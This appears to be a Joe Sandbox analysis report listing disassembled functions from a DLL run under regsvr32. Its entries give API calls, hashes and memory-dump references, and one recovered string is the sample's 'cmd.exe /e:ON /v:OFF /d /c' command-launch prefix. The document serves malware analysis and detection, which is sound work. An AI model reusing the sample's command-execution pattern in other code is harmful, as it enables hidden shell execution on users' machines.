HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000621,?,000000FF,?), ref: 00007FF8A932B658

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heapmemcpy$Free$Process
String ID:
API String ID: 2743480619-0
Opcode ID: 36c53ef5deb7f32668853e252c9624e1f49ae9a9ad4dd2d022b969e742445ee2
Instruction ID: b9530b911be39cf129a5006ee7d0ced71380df421b3d2ee92bd78a295b93b8f2
Opcode Fuzzy Hash: 36c53ef5deb7f32668853e252c9624e1f49ae9a9ad4dd2d022b969e742445ee2
Instruction Fuzzy Hash: DDA17E62A0AFC1A6E7488F26A8053BD67B4FB197C4F44953ADE5D97785DF38E4A08300

Function 00007FF8A932BB06 Relevance: 8.9, APIs: 7, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e5685fac8d32ad2dc86b07b3dfe0dd3756730bb3d35cf67d305f6ae32ee370d2
Instruction ID: eb34ace778ec693619fe4fe0826961ed225de66f6c1e6b048d7f899ca49f1081
Opcode Fuzzy Hash: e5685fac8d32ad2dc86b07b3dfe0dd3756730bb3d35cf67d305f6ae32ee370d2
Instruction Fuzzy Hash: FC815A32A0EFC2A4E7258F2198543F937B1FB597C8F44A176DA4D8BA88CF399644D340

Function 00007FF8A932BB5F Relevance: 8.9, APIs: 7, Instructions: 177memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2c3b31dd58b10a5e66037e4bb143dae89b57d3c976c48a3b6ddf84641229c8b4
Instruction ID: 2acc5f11317bc84ce36359cf841ec71e3a0d9872c7f7147b1fd4173db1cc1cd2
Opcode Fuzzy Hash: 2c3b31dd58b10a5e66037e4bb143dae89b57d3c976c48a3b6ddf84641229c8b4
Instruction Fuzzy Hash: C0814932A0EFC2A4E7258F2198543F937B1FB597C8F44A176DA5D8BA88CF399644D340

Function 00007FF8A932BC49 Relevance: 8.9, APIs: 7, Instructions: 176memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 383fcb2ae74fb274de0dcbbaa5cbd9025323f7c2d2d5c1ac30af36d000b06b73
Instruction ID: e8baa1cb59322074ef9a73c5b78c8da8a5c7b84909a57351a3890f874bad3bb7
Opcode Fuzzy Hash: 383fcb2ae74fb274de0dcbbaa5cbd9025323f7c2d2d5c1ac30af36d000b06b73
Instruction Fuzzy Hash: 8B815932A0EFC2A4E7258F2198543F937B1FB597C8F44A176DA4D8BA88CF399644D340

Function 00007FF8A932BEB0 Relevance: 8.9, APIs: 7, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6881156b941a4b653a04b0bbc4b60715dd53e91fce343bc0abba9b9a9a02d985
Instruction ID: 131089a503efaa0cac125ec65ef9ba9f4fa4a8974ddca2650db9f487c2eefb40
Opcode Fuzzy Hash: 6881156b941a4b653a04b0bbc4b60715dd53e91fce343bc0abba9b9a9a02d985
Instruction Fuzzy Hash: DA717C21A0EFC2A4F7258F2198443F933B1FB597C8F44A076DA0D9BA98CF39A941D340

Function 00007FF8A932BF3E Relevance: 8.9, APIs: 7, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 19fd1df5ada753cdaa2c7dbcda36aec0e60f662245c823ec9045183f89d2ad58
Instruction ID: f46c2d39f8ad520883fb8e2c295bf33821d86366913115eb4e232f9ec4142972
Opcode Fuzzy Hash: 19fd1df5ada753cdaa2c7dbcda36aec0e60f662245c823ec9045183f89d2ad58
Instruction Fuzzy Hash: 8C614A22A0EFC2A4E7248F2188543F937B1FB597C8F44A176CA4D9BA98CF399544D341

Function 00007FF8A932C262 Relevance: 8.9, APIs: 7, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 9c1e004fae9f0bf5966eaec1e847d22e05db450f4cf120411fc52461cb8c593b
Instruction ID: 18ce317e8062cb36ee4f44bf2f9caecc53ea8ade7a800fea0db122f53a33dfaa
Opcode Fuzzy Hash: 9c1e004fae9f0bf5966eaec1e847d22e05db450f4cf120411fc52461cb8c593b
Instruction Fuzzy Hash: 16613821A0EFC2A4FB648F21D8443F936B1EB587C8F04A176CA5D9BB98CF399544D341

Function 00007FF8A932C24B Relevance: 8.9, APIs: 7, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: ca5d287514c4e2dc6289f90171c34f0bd127cf93183bfc6847886a5853025648
Instruction ID: efbbf5e8499c4a7248a3440cee53e869274aa7c46317f4b33d36a49c2af1cf9f
Opcode Fuzzy Hash: ca5d287514c4e2dc6289f90171c34f0bd127cf93183bfc6847886a5853025648
Instruction Fuzzy Hash: 09511921A0EFC2A4F7648F21C8443F932B1FB597C8F44A176CA5D9BB98CF39A5459341

Function 00007FF8A932C29F Relevance: 8.9, APIs: 7, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 6987912418e482f5424e9cf242fdbe8bbf3a4953a296c281d00e5841a4fd2ab1
Instruction ID: 7ccb43f735786caa4b566c74ee821485bdbd6ae30db19f078d110a0ae6dafe27
Opcode Fuzzy Hash: 6987912418e482f5424e9cf242fdbe8bbf3a4953a296c281d00e5841a4fd2ab1
Instruction Fuzzy Hash: 03511821A0EFC2A8F7648F21C8443E933B1FB597C8F44A176CA1D9BB98CF39A5459341

Function 00007FF8A934F460 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A931F2C0: TlsGetValue.KERNEL32(?,?,?,?,00007FF8A934F4AA), ref: 00007FF8A931F2D9

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF8A934F91D

Strings

main, xrefs: 00007FF8A934F8B4
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF8A934F4BB, 00007FF8A934F576
Box<dyn Any><unnamed>, xrefs: 00007FF8A934F71E

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: AddressSingleValueWake
String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$main
API String ID: 741412973-2031151970
Opcode ID: 25dc098df5c166b442ebe9e08a1f7d72de5f200c3afe06ff354aab0fda181a1f
Instruction ID: aed123f8b5c20f783ed722d10590484823a745ebdefaf91437ade4f9e6e0e576
Opcode Fuzzy Hash: 25dc098df5c166b442ebe9e08a1f7d72de5f200c3afe06ff354aab0fda181a1f
Instruction Fuzzy Hash: EC227822A0EFD2A9EB108F60D8503BC37B0EB84789F596535DA4D867A5EF3CE545C340

Function 00007FF8A93279B0 Relevance: 6.7, APIs: 3, Strings: 1, Instructions: 698COMMON

Download Yara Rule

Strings

assertion failed: end >= start && end <= len, xrefs: 00007FF8A932A830

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: assertion failed: end >= start && end <= len
API String ID: 0-206846142
Opcode ID: b91defc51a6ab7b52e1da2ca7320925c8b4d9b473ecbb69dd3d0b8a8929ed095
Instruction ID: 66a1b4b9b0e6626fab0f68d88ecf230eef6fd685ee6580580476ee080cf73acc
Opcode Fuzzy Hash: b91defc51a6ab7b52e1da2ca7320925c8b4d9b473ecbb69dd3d0b8a8929ed095
Instruction Fuzzy Hash: B9626A72A0AFC5A6E7648F25D8447E927B0F728BC4F549036DA5E8BB88CF38D595C300

Function 00007FF8A9345EB0 Relevance: 6.7, APIs: 3, Strings: 1, Instructions: 655memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A934685B
HeapFree.KERNEL32 ref: 00007FF8A93468FC

Strings

cmd.exe /e:ON /v:OFF /d /c ", xrefs: 00007FF8A9345F37

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: cmd.exe /e:ON /v:OFF /d /c "
API String ID: 3298025750-533445247
Opcode ID: d027b3fbee4b8429ee97dbd3b56c8aed57f342c0261b5ddc8b33ed153e4f7194
Instruction ID: 91a0805d236d0de7d648b876b583a40eb614cae0a4e96d6947dd6e44b7cbc5d3
Opcode Fuzzy Hash: d027b3fbee4b8429ee97dbd3b56c8aed57f342c0261b5ddc8b33ed153e4f7194
Instruction Fuzzy Hash: 3342E262F1EDA1A4FF248F62D4106BD2B70FB947CDF466135CE1EA6B99CE38A5419300

Function 00007FF8A931AB30 Relevance: 5.2, APIs: 4, Instructions: 211memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,00007FF8A931AA8B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A931AC3C
HeapFree.KERNEL32(?,?,?,00007FF8A931AA8B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A931AD24
HeapFree.KERNEL32(?,?,?,00007FF8A931AA8B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A931ADF3
HeapFree.KERNEL32(?,?,?,00007FF8A931AA8B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A931AE8C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e785f8694466640ccbc8b3dea46aeb8a3c172319540ca5d006c9ea6d354e2579
Instruction ID: c01ad1a2c46c928f09788a61aed1a8e7f3b2e138695dc43cfcf397c24816ef9a
Opcode Fuzzy Hash: e785f8694466640ccbc8b3dea46aeb8a3c172319540ca5d006c9ea6d354e2579
Instruction Fuzzy Hash: B1719EA2A0EFC1A2EE558F1194503B966B5FB55BE1F24A532CA1DC77E1EE3CA5808300

Function 00007FF8A931AFA0 Relevance: 4.4, APIs: 3, Instructions: 681COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A931B130
memcpy.MSVCRT ref: 00007FF8A931B36A

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: a6a53b2942153456a0416578af69a6635fb8fe016562c353e00956de8b0eef41
Instruction ID: 768053cd5786aa66d88f8cd8a2570fbf2a103a9e21df194676935bae16532856
Opcode Fuzzy Hash: a6a53b2942153456a0416578af69a6635fb8fe016562c353e00956de8b0eef41
Instruction Fuzzy Hash: 9A424953A0EBE141DF168B39506417D6F61DBA6BA0B0AD369DEFA533D5EA3CC105C310

Function 00007FF8A9346910 Relevance: 4.1, APIs: 3, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
